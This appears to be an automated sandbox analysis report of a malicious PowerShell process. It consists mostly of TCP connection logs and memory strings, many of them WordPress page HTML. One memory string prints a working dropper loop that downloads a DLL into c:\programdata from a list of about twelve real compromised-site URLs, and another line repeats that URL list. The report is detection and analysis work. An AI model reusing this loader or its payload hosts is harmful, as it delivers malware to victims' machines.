Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 207.174.214.153:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.33.130.190:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 63.250.43.9:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	String found in memory: AAAAAI7PDhkPtE8YRVMe4WrYuoORGks-&ver=3.0" id="google-recaptcha-js"></script> <script src="https://trasix.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2" id="wp-polyfill-inert-js"></script> <script src="https://trasix.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script> <script src="https://trasix.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script> <script id="wpcf7-recaptcha-js-extra">var wpcf7_recaptcha = {"sitekey":"6LcI1WUaAAAAAI7PDhkPtE8YRVMe4WrYuoORGks-","actions":{"homepage":"homepage","contactform":"contactform"}};</script> <script src="https://trasix.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.9.3" id="wpcf7-recaptcha-js"></script> <script src="//ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script type="text/javascript">$(".top__info").fadeIn('slow');</script> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/dragscroll.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/smoothscroll/1.4.10/SmoothScroll.min.js" integrity="sha256-huW7yWl7tNfP7lGk46XE+Sp0nCotjzYodhVKlwaNeco=" crossorigin="anonymous"></script> <script>SmoothScroll({
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	String found in memory: })</script> <script src="https://trasix.com/wp-content/themes/trasix/js/wow.min.js"></script> <script>new WOW().init();</script> <script src="https://trasix.com/wp-content/themes/trasix/js/parallax.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.0.1/TweenMax.min.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/clickEvent.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/script.js"></script> </body><
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	String found in memory: /svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	String found in memory: s build something great together!</h2><div class="footer__menu"><nav><ul><li class="footer__menu-title">Modules</li><li id="menu-item-44" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-44"><a href="https://trasix.com/modules/line-planning/">Line planning</a></li><li id="menu-item-42" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42"><a href="https://trasix.com/modules/merchandizing/">Merchandizing</a></li><li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="https://trasix.com/modules/digital-catalog/">Digital catalog</a></li><li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="https://trasix.com/modules/digital-showroom-and-3d-sample-virtualization/">Digital showroom and sample virtualization</a></li><li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-40"><a href="https://trasix.com/modules/orders-collection-and-management/">Order collection & management</a></li></ul><ul><li class="footer__menu-title">Partner</li><li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a href="https://trasix.com/become-a-partner/">Become a partner</a></li><li id="menu-item-46" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46"><a href="https://trasix.com/integrations/">Integrations</a></li></ul><ul><li class="footer__menu-title">Company</li><li id="menu-item-49" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49"><a href="https://trasix.com/our-story/">Our story</a></li><li id="menu-item-826" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-826"><a href="https://trasix.com/blog/">Blog</a></li><li id="menu-item-48" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-48"><a href="https://trasix.com/contacts/">Contacts</a></li><li id="menu-item-47" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47"><a href="https://trasix.com/careers/">Careers</a></li></ul></nav></div></div></div></footer> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/abstract.png" alt="" class="gradient-container__bg"></noscript><img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://trasix.com/wp-content/themes/trasix/images/abstract.png" alt="" class="lazyload gradient-container__bg"></div><div class="loader"><div class="loader-container"> <noscript><img src="/wp-content/themes/trasix/images/logo.svg"></noscript><img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="/wp-content/themes/trasix/images/logo.svg"></div></div> <noscript><style>.lazyload{display:none;}</style></noscript><script data-noptimize="1">windo
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: context":"https://schema.org","
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: graph":[{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"WebSite","
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://anugerahmasinternasional.co.id/#website","url":"https://anugerahmasinternasional.co.id/","name":"","description":"","publisher":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://anugerahmasinternasional.co.id/#organization"},"potentialAction":[{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"SearchAction","target":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"EntryPoint","urlTemplate":"https://anugerahmasinternasional.co.id/?s={search_term_string}"},"query-input":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"id"},{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"Organization","
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://anugerahmasinternasional.co.id/#organization","name":"PT Anugerah Mas Internasional","url":"https://anugerahmasinternasional.co.id/","logo":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"ImageObject","inLanguage":"id","
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://anugerahmasinternasional.co.id/#/schema/logo/image/","url":"https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01.png","contentUrl":"https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01.png","width":512,"height":512,"caption":"PT Anugerah Mas Internasional"},"image":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://anugerahmasinternasional.co.id/#/schema/logo/image/"}}]}</script>
Source: powershell.exe, 00000005.00000002.477673890.0000000002211000.00000004.00000800.00020000.00000000.sdmp	String found in memory: $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}
Source: powershell.exe, 00000005.00000002.477673890.000000000241B000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://trasix.com/#organization"},"potentialAction":[{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: type":"ImageObject","inLanguage":"en-US","
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel="alternate" type="application/rss+xml" title="Trasix » Feed" href="https://trasix.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Trasix » Comments Feed" href="https://trasix.com/comments/feed/" /> <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/trasix.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: changes, or is temporarily anavailable.</p> <a href="/" class="btn-arrow"><span class="btn-pink">Go home</span> <span> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M12 4L10.59 5.41L16.17 11H4V13H16.17L10.59 18.59L12 20L20 12L12 4Z" fill="#F0F0F0"/> </svg> </span></a></div><div class="main-top__img-error"> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/error.png" alt=""></noscript><img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://trasix.com/wp-content/themes/trasix/images/error.png" alt=""></div></div> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/error-line.svg" alt="" class="contact-line"></noscript><img 